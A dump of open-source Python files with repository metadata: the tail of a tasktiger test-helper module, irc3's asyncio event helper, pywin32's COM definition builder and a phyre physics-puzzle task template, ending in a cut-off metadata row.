"BATCH_QUEUES": {"batch": 3},
"DEFAULT_RETRY_METHOD": fixed(DELAY, 2),
"EXCLUDE_QUEUES": ["periodic_ignore"],
"LOCK_RETRY": DELAY * 2.0,
"QUEUE_SCHEDULED_TASKS_TIME": DELAY,
"REQUEUE_EXPIRED_TASKS_INTERVAL": DELAY,
"SELECT_TIMEOUT": 0,
"SINGLE_WORKER_QUEUES": ["swq"],
}
class Patch:
"""
Simple context manager to patch a function, e.g.:
with Patch(module, 'func_name', mocked_func):
module.func_name() # will use mocked_func
module.func_name() # will use the original function
"""
def __init__(self, orig_obj, func_name, new_func):
self.orig_obj = orig_obj
self.func_name = func_name
self.new_func = new_func
def __enter__(self):
self.orig_func = getattr(self.orig_obj, self.func_name)
setattr(self.orig_obj, self.func_name, self.new_func)
def __exit__(self, *args):
setattr(self.orig_obj, self.func_name, self.orig_func)
def setup_structlog():
structlog.configure(
logger_factory=structlog.stdlib.LoggerFactory(),
wrapper_class=structlog.stdlib.BoundLogger,
)
logging.basicConfig(format="%(message)s")
def get_redis():
return redis.Redis(host=REDIS_HOST, db=TEST_DB, decode_responses=True)
def get_tiger():
"""
Sets up logging and returns a new tasktiger instance.
"""
setup_structlog()
conn = get_redis()
tiger = TaskTiger(connection=conn, config=TEST_TIGER_CONFIG)
tiger.log.setLevel(logging.CRITICAL)
return tiger
def external_worker(n=None, patch_config=None, max_workers_per_queue=None):
"""
Runs a worker. To be used with multiprocessing.Pool.map.
"""
tiger = get_tiger()
if patch_config:
tiger.config.update(patch_config)
worker = Worker(tiger)
if max_workers_per_queue is not None:
worker.max_workers_per_queue = max_workers_per_queue
worker.run(once=True, force_once=True)
tiger.connection.close()
def sleep_until_next_second():
now = datetime.datetime.utcnow()
time.sleep(1 - now.microsecond / 10.0**6)
|
76a72ec2188ba43ccc28fb7cf8538048eb550505
|
1f20484efc357aae4b7e2f98a191e7a9256f3a58
|
/irc3/asynchronous.py
|
e07d14cdc4fd88920dabb7c8bdc2726995796f59
|
[
"CC-BY-3.0",
"MIT",
"LicenseRef-scancode-ietf"
] |
permissive
|
gawel/irc3
|
55b2e4d01ca95f45077f8bad231394551584d7bd
|
76d6849d5e7a531d649aca766f623f9f30a55545
|
refs/heads/master
| 2023-07-15T20:49:40.188267
| 2023-04-17T09:02:31
| 2023-04-17T09:02:31
| 14,820,406
| 187
| 58
|
MIT
| 2023-02-27T10:18:41
| 2013-11-30T12:09:48
|
Python
|
UTF-8
|
Python
| false
| false
| 3,554
|
py
|
asynchronous.py
|
# -*- coding: utf-8 -*-
from .compat import asyncio
import re
class event:
iotype = 'in'
iscoroutine = True
def __init__(self, **kwargs):
# kwargs get interpolated into the regex.
# Any kwargs not ending in _re get escaped
self.meta = kwargs.get('meta')
regexp = self.meta['match'].format(**{
k: v if k.endswith('_re') else re.escape(v)
for (k, v) in kwargs.items()
if k != 'meta'
})
self.regexp = regexp
regexp = getattr(self.regexp, 're', self.regexp)
self.cregexp = re.compile(regexp).match
def compile(self, *args, **kwargs):
return self.cregexp
def __repr__(self):
s = getattr(self.regexp, 'name', self.regexp)
name = self.__class__.__name__
return '<temp_event {0} {1}>'.format(name, s)
def __call__(self, callback):
async def wrapper(*args, **kwargs):
return await callback(self, *args, **kwargs)
self.callback = wrapper
return self
def default_result_processor(self, results=None, **value): # pragma: no cover
value['results'] = results
if len(results) == 1:
value.update(results[0])
return value
def async_events(context, events, send_line=None,
process_results=default_result_processor,
timeout=30, **params):
loop = context.loop
task = loop.create_future() # async result
results = [] # store events results
events_ = [] # reference registered events
# async timeout
timeout = asyncio.ensure_future(
asyncio.sleep(timeout, loop=loop), loop=loop)
def end(t=None):
"""t can be a future (timeout done) or False (result success)"""
if not task.done():
# cancel timeout if needed
if t is False:
timeout.cancel()
# detach events
context.detach_events(*events_)
# clean refs
events_[:] = []
# set results
task.set_result(process_results(results=results, timeout=bool(t)))
# end on timeout
timeout.add_done_callback(end)
def callback(e, **kw):
"""common callback for all events"""
results.append(kw)
if e.meta.get('multi') is not True:
context.detach_events(e)
events_.remove(e)
if e.meta.get('final') is True:
# end on success
end(False)
events_.extend([event(meta=kw, **params)(callback) for kw in events])
context.attach_events(*events_, insert=True)
if send_line:
context.send_line(send_line.format(**params))
return task
class AsyncEvents:
"""Asynchronious events"""
timeout = 30
send_line = None
events = []
def __init__(self, context):
self.context = context
def process_results(self, results=None, **value): # pragma: no cover
"""Process results.
results is a list of dict catched during event.
value is a dict containing some metadata (like timeout=(True/False).
"""
return default_result_processor(results=results, **value)
def __call__(self, **kwargs):
"""Register events; and callbacks then return a `asyncio.Future`.
Events regexp are compiled with `params`"""
kwargs.setdefault('timeout', self.timeout)
kwargs.setdefault('send_line', self.send_line)
kwargs['process_results'] = self.process_results
return async_events(self.context, self.events, **kwargs)
|
664798511939ed739259077279029ce453851e59
|
2181883c8faac55bfc969a97d22d9b24a3e81ab3
|
/com/win32com/client/build.py
|
84dacb566a23463c30c211599b5e2dd691735ac8
|
[
"PSF-2.0"
] |
permissive
|
mhammond/pywin32
|
574bf121cfeac8c7a9d28f94ee0f2069a425e8ab
|
2a7137f21965013020ef9e4f27565db6dea59003
|
refs/heads/main
| 2023-09-02T13:16:52.307262
| 2023-08-17T19:42:26
| 2023-08-17T19:42:26
| 108,187,130
| 4,757
| 907
| null | 2023-08-23T01:45:49
| 2017-10-24T21:44:27
|
C++
|
UTF-8
|
Python
| false
| false
| 28,904
|
py
|
build.py
|
"""Contains knowledge to build a COM object definition.
This module is used by both the @dynamic@ and @makepy@ modules to build
all knowledge of a COM object.
This module contains classes which contain the actual knowledge of the object.
This include parameter and return type information, the COM dispid and CLSID, etc.
Other modules may use this information to generate .py files, use the information
dynamically, or possibly even generate .html documentation for objects.
"""
#
# NOTES: DispatchItem and MapEntry used by dynamic.py.
# the rest is used by makepy.py
#
# OleItem, DispatchItem, MapEntry, BuildCallList() is used by makepy
import datetime
import string
from keyword import iskeyword
import pythoncom
import winerror
from pywintypes import TimeType
# It isn't really clear what the quoting rules are in a C/IDL string and
# literals like a quote char and backslashes makes life a little painful to
# always render the string perfectly - so just punt and fall-back to a repr()
def _makeDocString(s):
return repr(s)
error = "PythonCOM.Client.Build error"
class NotSupportedException(Exception):
pass # Raised when we cant support a param type.
DropIndirection = "DropIndirection"
NoTranslateTypes = [
pythoncom.VT_BOOL,
pythoncom.VT_CLSID,
pythoncom.VT_CY,
pythoncom.VT_DATE,
pythoncom.VT_DECIMAL,
pythoncom.VT_EMPTY,
pythoncom.VT_ERROR,
pythoncom.VT_FILETIME,
pythoncom.VT_HRESULT,
pythoncom.VT_I1,
pythoncom.VT_I2,
pythoncom.VT_I4,
pythoncom.VT_I8,
pythoncom.VT_INT,
pythoncom.VT_NULL,
pythoncom.VT_R4,
pythoncom.VT_R8,
pythoncom.VT_NULL,
pythoncom.VT_STREAM,
pythoncom.VT_UI1,
pythoncom.VT_UI2,
pythoncom.VT_UI4,
pythoncom.VT_UI8,
pythoncom.VT_UINT,
pythoncom.VT_VOID,
]
NoTranslateMap = {}
for v in NoTranslateTypes:
NoTranslateMap[v] = None
class MapEntry:
"Simple holder for named attibutes - items in a map."
def __init__(
self,
desc_or_id,
names=None,
doc=None,
resultCLSID=pythoncom.IID_NULL,
resultDoc=None,
hidden=0,
):
if isinstance(desc_or_id, int):
self.dispid = desc_or_id
self.desc = None
else:
self.dispid = desc_or_id[0]
self.desc = desc_or_id
self.names = names
self.doc = doc
self.resultCLSID = resultCLSID
self.resultDocumentation = resultDoc
self.wasProperty = (
0 # Have I been transformed into a function so I can pass args?
)
self.hidden = hidden
def __repr__(self):
return (
"MapEntry(dispid={s.dispid}, desc={s.desc}, names={s.names}, doc={s.doc!r}, "
"resultCLSID={s.resultCLSID}, resultDocumentation={s.resultDocumentation}, "
"wasProperty={s.wasProperty}, hidden={s.hidden}"
).format(s=self)
def GetResultCLSID(self):
rc = self.resultCLSID
if rc == pythoncom.IID_NULL:
return None
return rc
# Return a string, suitable for output - either "'{...}'" or "None"
def GetResultCLSIDStr(self):
rc = self.GetResultCLSID()
if rc is None:
return "None"
return repr(
str(rc)
) # Convert the IID object to a string, then to a string in a string.
def GetResultName(self):
if self.resultDocumentation is None:
return None
return self.resultDocumentation[0]
class OleItem:
typename = "OleItem"
def __init__(self, doc=None):
self.doc = doc
if self.doc:
self.python_name = MakePublicAttributeName(self.doc[0])
else:
self.python_name = None
self.bWritten = 0
self.bIsDispatch = 0
self.bIsSink = 0
self.clsid = None
self.co_class = None
class DispatchItem(OleItem):
typename = "DispatchItem"
def __init__(self, typeinfo=None, attr=None, doc=None, bForUser=1):
OleItem.__init__(self, doc)
self.propMap = {}
self.propMapGet = {}
self.propMapPut = {}
self.mapFuncs = {}
self.defaultDispatchName = None
self.hidden = 0
if typeinfo:
self.Build(typeinfo, attr, bForUser)
def _propMapPutCheck_(self, key, item):
ins, outs, opts = self.CountInOutOptArgs(item.desc[2])
if ins > 1: # if a Put property takes more than 1 arg:
if opts + 1 == ins or ins == item.desc[6] + 1:
newKey = "Set" + key
deleteExisting = 0 # This one is still OK
else:
deleteExisting = 1 # No good to us
if key in self.mapFuncs or key in self.propMapGet:
newKey = "Set" + key
else:
newKey = key
item.wasProperty = 1
self.mapFuncs[newKey] = item
if deleteExisting:
del self.propMapPut[key]
def _propMapGetCheck_(self, key, item):
ins, outs, opts = self.CountInOutOptArgs(item.desc[2])
if ins > 0: # if a Get property takes _any_ in args:
if item.desc[6] == ins or ins == opts:
newKey = "Get" + key
deleteExisting = 0 # This one is still OK
else:
deleteExisting = 1 # No good to us
if key in self.mapFuncs:
newKey = "Get" + key
else:
newKey = key
item.wasProperty = 1
self.mapFuncs[newKey] = item
if deleteExisting:
del self.propMapGet[key]
def _AddFunc_(self, typeinfo, fdesc, bForUser):
assert fdesc.desckind == pythoncom.DESCKIND_FUNCDESC
id = fdesc.memid
funcflags = fdesc.wFuncFlags
try:
names = typeinfo.GetNames(id)
name = names[0]
except pythoncom.ole_error:
name = ""
names = None
doc = None
try:
if bForUser:
doc = typeinfo.GetDocumentation(id)
except pythoncom.ole_error:
pass
if id == 0 and name:
self.defaultDispatchName = name
invkind = fdesc.invkind
# We need to translate any Alias', Enums, structs etc in result and args
typerepr, flag, defval = fdesc.rettype
# sys.stderr.write("%s result - %s -> " % (name, typerepr))
typerepr, resultCLSID, resultDoc = _ResolveType(typerepr, typeinfo)
# sys.stderr.write("%s\n" % (typerepr,))
fdesc.rettype = typerepr, flag, defval, resultCLSID
# Translate any Alias or Enums in argument list.
argList = []
for argDesc in fdesc.args:
typerepr, flag, defval = argDesc
# sys.stderr.write("%s arg - %s -> " % (name, typerepr))
arg_type, arg_clsid, arg_doc = _ResolveType(typerepr, typeinfo)
argDesc = arg_type, flag, defval, arg_clsid
# sys.stderr.write("%s\n" % (argDesc[0],))
argList.append(argDesc)
fdesc.args = tuple(argList)
hidden = (funcflags & pythoncom.FUNCFLAG_FHIDDEN) != 0
if invkind == pythoncom.INVOKE_PROPERTYGET:
map = self.propMapGet
# This is not the best solution, but I dont think there is
# one without specific "set" syntax.
# If there is a single PUT or PUTREF, it will function as a property.
# If there are both, then the PUT remains a property, and the PUTREF
# gets transformed into a function.
# (in vb, PUT=="obj=other_obj", PUTREF="set obj=other_obj
elif invkind in (pythoncom.INVOKE_PROPERTYPUT, pythoncom.INVOKE_PROPERTYPUTREF):
# Special case
existing = self.propMapPut.get(name, None)
if existing is not None:
if existing.desc[4] == pythoncom.INVOKE_PROPERTYPUT: # Keep this one
map = self.mapFuncs
name = "Set" + name
else: # Existing becomes a func.
existing.wasProperty = 1
self.mapFuncs["Set" + name] = existing
map = self.propMapPut # existing gets overwritten below.
else:
map = self.propMapPut # first time weve seen it.
elif invkind == pythoncom.INVOKE_FUNC:
map = self.mapFuncs
else:
map = None
if not map is None:
# if map.has_key(name):
# sys.stderr.write("Warning - overwriting existing method/attribute %s\n" % name)
map[name] = MapEntry(fdesc, names, doc, resultCLSID, resultDoc, hidden)
# any methods that can't be reached via DISPATCH we return None
# for, so dynamic dispatch doesnt see it.
if fdesc.funckind != pythoncom.FUNC_DISPATCH:
return None
return (name, map)
return None
def _AddVar_(self, typeinfo, vardesc, bForUser):
### need pythoncom.VARFLAG_FRESTRICTED ...
### then check it
assert vardesc.desckind == pythoncom.DESCKIND_VARDESC
if vardesc.varkind == pythoncom.VAR_DISPATCH:
id = vardesc.memid
names = typeinfo.GetNames(id)
# Translate any Alias or Enums in result.
typerepr, flags, defval = vardesc.elemdescVar
typerepr, resultCLSID, resultDoc = _ResolveType(typerepr, typeinfo)
vardesc.elemdescVar = typerepr, flags, defval
doc = None
try:
if bForUser:
doc = typeinfo.GetDocumentation(id)
except pythoncom.ole_error:
pass
# handle the enumerator specially
map = self.propMap
# Check if the element is hidden.
hidden = (vardesc.wVarFlags & 0x40) != 0 # VARFLAG_FHIDDEN
map[names[0]] = MapEntry(
vardesc, names, doc, resultCLSID, resultDoc, hidden
)
return (names[0], map)
else:
return None
def Build(self, typeinfo, attr, bForUser=1):
self.clsid = attr[0]
self.bIsDispatch = (attr.wTypeFlags & pythoncom.TYPEFLAG_FDISPATCHABLE) != 0
if typeinfo is None:
return
# Loop over all methods
for j in range(attr[6]):
fdesc = typeinfo.GetFuncDesc(j)
self._AddFunc_(typeinfo, fdesc, bForUser)
# Loop over all variables (ie, properties)
for j in range(attr[7]):
fdesc = typeinfo.GetVarDesc(j)
self._AddVar_(typeinfo, fdesc, bForUser)
# Now post-process the maps. For any "Get" or "Set" properties
# that have arguments, we must turn them into methods. If a method
# of the same name already exists, change the name.
for key, item in list(self.propMapGet.items()):
self._propMapGetCheck_(key, item)
for key, item in list(self.propMapPut.items()):
self._propMapPutCheck_(key, item)
def CountInOutOptArgs(self, argTuple):
"Return tuple counting in/outs/OPTS. Sum of result may not be len(argTuple), as some args may be in/out."
ins = out = opts = 0
for argCheck in argTuple:
inOut = argCheck[1]
if inOut == 0:
ins = ins + 1
out = out + 1
else:
if inOut & pythoncom.PARAMFLAG_FIN:
ins = ins + 1
if inOut & pythoncom.PARAMFLAG_FOPT:
opts = opts + 1
if inOut & pythoncom.PARAMFLAG_FOUT:
out = out + 1
return ins, out, opts
def MakeFuncMethod(self, entry, name, bMakeClass=1):
# If we have a type description, and not varargs...
if entry.desc is not None and (len(entry.desc) < 6 or entry.desc[6] != -1):
return self.MakeDispatchFuncMethod(entry, name, bMakeClass)
else:
return self.MakeVarArgsFuncMethod(entry, name, bMakeClass)
def MakeDispatchFuncMethod(self, entry, name, bMakeClass=1):
fdesc = entry.desc
doc = entry.doc
names = entry.names
ret = []
if bMakeClass:
linePrefix = "\t"
defNamedOptArg = "defaultNamedOptArg"
defNamedNotOptArg = "defaultNamedNotOptArg"
defUnnamedArg = "defaultUnnamedArg"
else:
linePrefix = ""
defNamedOptArg = "pythoncom.Missing"
defNamedNotOptArg = "pythoncom.Missing"
defUnnamedArg = "pythoncom.Missing"
defOutArg = "pythoncom.Missing"
id = fdesc[0]
s = (
linePrefix
+ "def "
+ name
+ "(self"
+ BuildCallList(
fdesc,
names,
defNamedOptArg,
defNamedNotOptArg,
defUnnamedArg,
defOutArg,
)
+ "):"
)
ret.append(s)
if doc and doc[1]:
ret.append(linePrefix + "\t" + _makeDocString(doc[1]))
resclsid = entry.GetResultCLSID()
if resclsid:
resclsid = "'%s'" % resclsid
else:
resclsid = "None"
# Strip the default values from the arg desc
retDesc = fdesc[8][:2]
argsDesc = tuple([what[:2] for what in fdesc[2]])
# The runtime translation of the return types is expensive, so when we know the
# return type of the function, there is no need to check the type at runtime.
# To qualify, this function must return a "simple" type, and have no byref args.
# Check if we have byrefs or anything in the args which mean we still need a translate.
param_flags = [what[1] for what in fdesc[2]]
bad_params = [
flag
for flag in param_flags
if flag & (pythoncom.PARAMFLAG_FOUT | pythoncom.PARAMFLAG_FRETVAL) != 0
]
s = None
if len(bad_params) == 0 and len(retDesc) == 2 and retDesc[1] == 0:
rd = retDesc[0]
if rd in NoTranslateMap:
s = "%s\treturn self._oleobj_.InvokeTypes(%d, LCID, %s, %s, %s%s)" % (
linePrefix,
id,
fdesc[4],
retDesc,
argsDesc,
_BuildArgList(fdesc, names),
)
elif rd in [pythoncom.VT_DISPATCH, pythoncom.VT_UNKNOWN]:
s = "%s\tret = self._oleobj_.InvokeTypes(%d, LCID, %s, %s, %s%s)\n" % (
linePrefix,
id,
fdesc[4],
retDesc,
repr(argsDesc),
_BuildArgList(fdesc, names),
)
s = s + "%s\tif ret is not None:\n" % (linePrefix,)
if rd == pythoncom.VT_UNKNOWN:
s = s + "%s\t\t# See if this IUnknown is really an IDispatch\n" % (
linePrefix,
)
s = s + "%s\t\ttry:\n" % (linePrefix,)
s = (
s
+ "%s\t\t\tret = ret.QueryInterface(pythoncom.IID_IDispatch)\n"
% (linePrefix,)
)
s = s + "%s\t\texcept pythoncom.error:\n" % (linePrefix,)
s = s + "%s\t\t\treturn ret\n" % (linePrefix,)
s = s + "%s\t\tret = Dispatch(ret, %s, %s)\n" % (
linePrefix,
repr(name),
resclsid,
)
s = s + "%s\treturn ret" % (linePrefix)
elif rd == pythoncom.VT_BSTR:
s = "%s\t# Result is a Unicode object\n" % (linePrefix,)
s = (
s
+ "%s\treturn self._oleobj_.InvokeTypes(%d, LCID, %s, %s, %s%s)"
% (
linePrefix,
id,
fdesc[4],
retDesc,
repr(argsDesc),
_BuildArgList(fdesc, names),
)
)
# else s remains None
if s is None:
s = "%s\treturn self._ApplyTypes_(%d, %s, %s, %s, %s, %s%s)" % (
linePrefix,
id,
fdesc[4],
retDesc,
argsDesc,
repr(name),
resclsid,
_BuildArgList(fdesc, names),
)
ret.append(s)
ret.append("")
return ret
def MakeVarArgsFuncMethod(self, entry, name, bMakeClass=1):
fdesc = entry.desc
names = entry.names
doc = entry.doc
ret = []
argPrefix = "self"
if bMakeClass:
linePrefix = "\t"
else:
linePrefix = ""
ret.append(linePrefix + "def " + name + "(" + argPrefix + ", *args):")
if doc and doc[1]:
ret.append(linePrefix + "\t" + _makeDocString(doc[1]))
if fdesc:
invoketype = fdesc[4]
else:
invoketype = pythoncom.DISPATCH_METHOD
s = linePrefix + "\treturn self._get_good_object_(self._oleobj_.Invoke(*(("
ret.append(
s + str(entry.dispid) + ",0,%d,1)+args)),'%s')" % (invoketype, names[0])
)
ret.append("")
return ret
# Note - "DispatchItem" poorly named - need a new intermediate class.
class VTableItem(DispatchItem):
def Build(self, typeinfo, attr, bForUser=1):
DispatchItem.Build(self, typeinfo, attr, bForUser)
assert typeinfo is not None, "Cant build vtables without type info!"
meth_list = (
list(self.mapFuncs.values())
+ list(self.propMapGet.values())
+ list(self.propMapPut.values())
)
meth_list.sort(key=lambda m: m.desc[7])
# Now turn this list into the run-time representation
# (ready for immediate use or writing to gencache)
self.vtableFuncs = []
for entry in meth_list:
self.vtableFuncs.append((entry.names, entry.dispid, entry.desc))
# A Lazy dispatch item - builds an item on request using info from
# an ITypeComp. The dynamic module makes the called to build each item,
# and also holds the references to the typeinfo and typecomp.
class LazyDispatchItem(DispatchItem):
typename = "LazyDispatchItem"
def __init__(self, attr, doc):
self.clsid = attr[0]
DispatchItem.__init__(self, None, attr, doc, 0)
typeSubstMap = {
pythoncom.VT_INT: pythoncom.VT_I4,
pythoncom.VT_UINT: pythoncom.VT_UI4,
pythoncom.VT_HRESULT: pythoncom.VT_I4,
}
def _ResolveType(typerepr, itypeinfo):
# Resolve VT_USERDEFINED (often aliases or typed IDispatches)
if isinstance(typerepr, tuple):
indir_vt, subrepr = typerepr
if indir_vt == pythoncom.VT_PTR:
# If it is a VT_PTR to a VT_USERDEFINED that is an IDispatch/IUnknown,
# then it resolves to simply the object.
# Otherwise, it becomes a ByRef of the resolved type
# We need to drop an indirection level on pointer to user defined interfaces.
# eg, (VT_PTR, (VT_USERDEFINED, somehandle)) needs to become VT_DISPATCH
# only when "somehandle" is an object.
# but (VT_PTR, (VT_USERDEFINED, otherhandle)) doesnt get the indirection dropped.
was_user = (
isinstance(subrepr, tuple) and subrepr[0] == pythoncom.VT_USERDEFINED
)
subrepr, sub_clsid, sub_doc = _ResolveType(subrepr, itypeinfo)
if was_user and subrepr in [
pythoncom.VT_DISPATCH,
pythoncom.VT_UNKNOWN,
pythoncom.VT_RECORD,
]:
# Drop the VT_PTR indirection
return subrepr, sub_clsid, sub_doc
# Change PTR indirection to byref
return subrepr | pythoncom.VT_BYREF, sub_clsid, sub_doc
if indir_vt == pythoncom.VT_SAFEARRAY:
# resolve the array element, and convert to VT_ARRAY
subrepr, sub_clsid, sub_doc = _ResolveType(subrepr, itypeinfo)
return pythoncom.VT_ARRAY | subrepr, sub_clsid, sub_doc
if indir_vt == pythoncom.VT_CARRAY: # runtime has no support for this yet.
# resolve the array element, and convert to VT_CARRAY
# sheesh - return _something_
return pythoncom.VT_CARRAY, None, None
if indir_vt == pythoncom.VT_USERDEFINED:
try:
resultTypeInfo = itypeinfo.GetRefTypeInfo(subrepr)
except pythoncom.com_error as details:
if details.hresult in [
winerror.TYPE_E_CANTLOADLIBRARY,
winerror.TYPE_E_LIBNOTREGISTERED,
]:
# an unregistered interface
return pythoncom.VT_UNKNOWN, None, None
raise
resultAttr = resultTypeInfo.GetTypeAttr()
typeKind = resultAttr.typekind
if typeKind == pythoncom.TKIND_ALIAS:
tdesc = resultAttr.tdescAlias
return _ResolveType(tdesc, resultTypeInfo)
elif typeKind in [pythoncom.TKIND_ENUM, pythoncom.TKIND_MODULE]:
# For now, assume Long
return pythoncom.VT_I4, None, None
elif typeKind == pythoncom.TKIND_DISPATCH:
clsid = resultTypeInfo.GetTypeAttr()[0]
retdoc = resultTypeInfo.GetDocumentation(-1)
return pythoncom.VT_DISPATCH, clsid, retdoc
elif typeKind in [pythoncom.TKIND_INTERFACE, pythoncom.TKIND_COCLASS]:
# XXX - should probably get default interface for CO_CLASS???
clsid = resultTypeInfo.GetTypeAttr()[0]
retdoc = resultTypeInfo.GetDocumentation(-1)
return pythoncom.VT_UNKNOWN, clsid, retdoc
elif typeKind == pythoncom.TKIND_RECORD:
return pythoncom.VT_RECORD, None, None
raise NotSupportedException("Can not resolve alias or user-defined type")
return typeSubstMap.get(typerepr, typerepr), None, None
def _BuildArgList(fdesc, names):
"Builds list of args to the underlying Invoke method."
# Word has TypeInfo for Insert() method, but says "no args"
numArgs = max(fdesc[6], len(fdesc[2]))
names = list(names)
while None in names:
i = names.index(None)
names[i] = "arg%d" % (i,)
# We've seen 'source safe' libraries offer the name of 'ret' params in
# 'names' - although we can't reproduce this, it would be insane to offer
# more args than we have arg infos for - hence the upper limit on names...
names = list(map(MakePublicAttributeName, names[1 : (numArgs + 1)]))
name_num = 0
while len(names) < numArgs:
names.append("arg%d" % (len(names),))
# As per BuildCallList(), avoid huge lines.
# Hack a "\n" at the end of every 5th name
for i in range(0, len(names), 5):
names[i] = names[i] + "\n\t\t\t"
return "," + ", ".join(names)
valid_identifier_chars = string.ascii_letters + string.digits + "_"
def demunge_leading_underscores(className):
i = 0
while className[i] == "_":
i += 1
assert i >= 2, "Should only be here with names starting with '__'"
return className[i - 1 :] + className[: i - 1]
# Given a "public name" (eg, the name of a class, function, etc)
# make sure it is a legal (and reasonable!) Python name.
def MakePublicAttributeName(className, is_global=False):
# Given a class attribute that needs to be public, convert it to a
# reasonable name.
# Also need to be careful that the munging doesnt
# create duplicates - eg, just removing a leading "_" is likely to cause
# a clash.
# if is_global is True, then the name is a global variable that may
# overwrite a builtin - eg, "None"
if className[:2] == "__":
return demunge_leading_underscores(className)
elif className == "None":
# assign to None is evil (and SyntaxError in 2.4, even though
# iskeyword says False there) - note that if it was a global
# it would get picked up below
className = "NONE"
elif iskeyword(className):
# most keywords are lower case (except True, False, etc)
ret = className.capitalize()
# but those which aren't get forced upper.
if ret == className:
ret = ret.upper()
return ret
elif is_global and hasattr(__builtins__, className):
# builtins may be mixed case. If capitalizing it doesn't change it,
# force to all uppercase (eg, "None", "True" become "NONE", "TRUE"
ret = className.capitalize()
if ret == className: # didn't change - force all uppercase.
ret = ret.upper()
return ret
# Strip non printable chars
return "".join([char for char in className if char in valid_identifier_chars])
# Given a default value passed by a type library, return a string with
# an appropriate repr() for the type.
# Takes a raw ELEMDESC and returns a repr string, or None
# (NOTE: The string itself may be '"None"', which is valid, and different to None.
# XXX - To do: Dates are probably screwed, but can they come in?
def MakeDefaultArgRepr(defArgVal):
try:
inOut = defArgVal[1]
except IndexError:
# something strange - assume is in param.
inOut = pythoncom.PARAMFLAG_FIN
if inOut & pythoncom.PARAMFLAG_FHASDEFAULT:
# times need special handling...
val = defArgVal[2]
if isinstance(val, datetime.datetime):
# VARIANT <-> SYSTEMTIME conversions always lose any sub-second
# resolution, so just use a 'timetuple' here.
return repr(tuple(val.utctimetuple()))
if isinstance(val, TimeType):
# must be the 'old' pywintypes time object...
year = val.year
month = val.month
day = val.day
hour = val.hour
minute = val.minute
second = val.second
msec = val.msec
return (
"pywintypes.Time((%(year)d, %(month)d, %(day)d, %(hour)d, %(minute)d, %(second)d,0,0,0,%(msec)d))"
% locals()
)
return repr(val)
return None
def BuildCallList(
fdesc,
names,
defNamedOptArg,
defNamedNotOptArg,
defUnnamedArg,
defOutArg,
is_comment=False,
):
"Builds a Python declaration for a method."
# Names[0] is the func name - param names are from 1.
numArgs = len(fdesc[2])
numOptArgs = fdesc[6]
strval = ""
if numOptArgs == -1: # Special value that says "var args after here"
firstOptArg = numArgs
numArgs = numArgs - 1
else:
firstOptArg = numArgs - numOptArgs
for arg in range(numArgs):
try:
argName = names[arg + 1]
namedArg = argName is not None
except IndexError:
namedArg = 0
if not namedArg:
argName = "arg%d" % (arg)
thisdesc = fdesc[2][arg]
# See if the IDL specified a default value
defArgVal = MakeDefaultArgRepr(thisdesc)
if defArgVal is None:
# Out params always get their special default
if (
thisdesc[1] & (pythoncom.PARAMFLAG_FOUT | pythoncom.PARAMFLAG_FIN)
== pythoncom.PARAMFLAG_FOUT
):
defArgVal = defOutArg
else:
# Unnamed arg - always allow default values.
if namedArg:
# Is a named argument
if arg >= firstOptArg:
defArgVal = defNamedOptArg
else:
defArgVal = defNamedNotOptArg
else:
defArgVal = defUnnamedArg
argName = MakePublicAttributeName(argName)
# keep 5 args per line
# This may still fail if the arg names are insane, but that seems
# unlikely. See also _BuildArgList()
if (arg + 1) % 5 == 0:
strval = strval + "\n"
if is_comment:
strval = strval + "#"
strval = strval + "\t\t\t"
strval = strval + ", " + argName
if defArgVal:
strval = strval + "=" + defArgVal
if numOptArgs == -1:
strval = strval + ", *" + names[-1]
return strval
if __name__ == "__main__":
print("Use 'makepy.py' to generate Python code - this module is just a helper")
|
f32e1e3a07f9e9f4b49c078e94dbf59ea61767be
|
fd51c0e7d532b164b58c69e36d196c59cbdac6ff
|
/data/task_scripts/main/task00002.py
|
6dc06e62e1db44b37828b093d30efeb57bea21d5
|
[
"Apache-2.0",
"LicenseRef-scancode-unknown-license-reference"
] |
permissive
|
facebookresearch/phyre
|
18fa1db4271fba922b1372610abac718d8833927
|
d0765dd2f6d6cf41b933a3a57173c63d21fbfa6a
|
refs/heads/main
| 2023-08-24T13:54:34.500729
| 2022-04-20T22:46:08
| 2022-04-20T22:46:08
| 192,634,486
| 462
| 76
|
Apache-2.0
| 2023-07-08T03:40:59
| 2019-06-19T01:12:56
|
Python
|
UTF-8
|
Python
| false
| false
| 1,963
|
py
|
task00002.py
|
# Copyright (c) Facebook, Inc. and its affiliates.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Template task with a ball that should avoid an obstacle bar to hit ground."""
import phyre.creator as creator_lib
__OBSTACLE_WIDTHS = [val * 0.1 for val in range(1, 8)]
__OBSTACLE_YS = [val * 0.1 for val in range(3, 8)]
__OBSTACLE_XS = [val * 0.1 for val in range(0, 11)]
@creator_lib.define_task_template(
obstacle_width=__OBSTACLE_WIDTHS,
obstacle_x=__OBSTACLE_XS,
obstacle_y=__OBSTACLE_YS,
search_params=dict(
required_flags=['BALL:GOOD_STABLE'],
excluded_flags=['BALL:TRIVIAL'],
diversify_tier='ball'
),
max_tasks=100)
def build_task(C, obstacle_width, obstacle_x, obstacle_y):
# Add obstacle.
if obstacle_x + obstacle_width > 1.:
raise creator_lib.SkipTemplateParams
obstacle_x *= C.scene.width
obstacle_y *= C.scene.height
obstacle = C.add('static bar', scale=obstacle_width) \
.set_left(obstacle_x) \
.set_bottom(obstacle_y)
# Add ball centered on top of obstacle.
ball = C.add('dynamic ball', scale=0.1) \
.set_center_x(obstacle_x + obstacle.width / 2.) \
.set_bottom(0.9 * C.scene.height)
bottom_wall = C.add('static bar', 1, bottom=0, left=0)
# Create assignment.
C.update_task(
body1=ball,
body2=bottom_wall,
relationships=[C.SpatialRelationship.TOUCHING])
C.set_meta(C.SolutionTier.BALL)
|
2b9c68c1476e525d2926fec980cf36ed156e9e5e
|
8bb21974ad267f52bb97ea82db6b57ee87482cbc
|
/core/nn/basic.py
|
c02cab5a3b765b9954a2e4bf8ceb3f23b653ff19
|
[
"Apache-2.0"
] |
permissive
|
Tramac/awesome-semantic-segmentation-pytorch
|
f1f20ed45a1caa016d3ef06225d06093b8a5d7ca
|
d37d2a17221d2681ad454958cf06a1065e9b1f7f
|
refs/heads/master
| 2023-08-29T06:20:59.816176
| 2023-01-04T08:24:27
| 2023-01-04T08:24:27
| 174,904,616
